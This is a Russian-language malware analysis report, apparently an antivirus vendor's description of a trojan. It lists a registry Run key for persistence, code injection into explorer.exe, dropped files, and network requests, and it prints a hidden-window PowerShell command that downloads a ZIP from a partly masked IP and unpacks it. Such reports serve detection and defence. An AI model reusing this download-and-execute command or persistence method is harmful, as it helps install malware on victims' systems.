Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'QznwSWwPL' = '%LOCALAPPDATA%QznwSWwPL\QznwSWwPL.exe'
Вредоносные функции
Загружает и запускает на исполнение
- http://10#.#00.67.112/download/kl.zip как c:\gfgenfe\xhwcpmol.zip
Внедряет код в
следующие системные процессы:
- %WINDIR%\syswow64\explorer.exe
Изменения в файловой системе
Создает следующие файлы
- C:\gfgenfe\xhwcpmol.zip
- C:\gfgenfe\launcher.exe
- C:\gfgenfe\msctfmonitor.dll
- C:\gfgenfe\staticcache.dat
- %LOCALAPPDATA%qznwswwpl\qznwswwpl.exe
- %LOCALAPPDATA%qznwswwpl\msctfmonitor.dll
- %LOCALAPPDATA%qznwswwpl\staticcache.dat
Сетевая активность
TCP
Запросы HTTP GET
- http://10#.#00.67.112/download/KL.zip
- http://ip##pi.com/json/
UDP
- DNS ASK ip##pi.com
Другое
Создает и запускает на исполнение
- 'C:\gfgenfe\launcher.exe'
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' (New-Object Net.WebClient).DownloadFile('http://10#.#00.67.112/download/KL.zip','C:\gfgenfe\xHWCPMoL.zip');(new-object -com shell.application).namespace('C:\gfgenfe').CopyHere((new-object -com ...' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\explorer.exe'
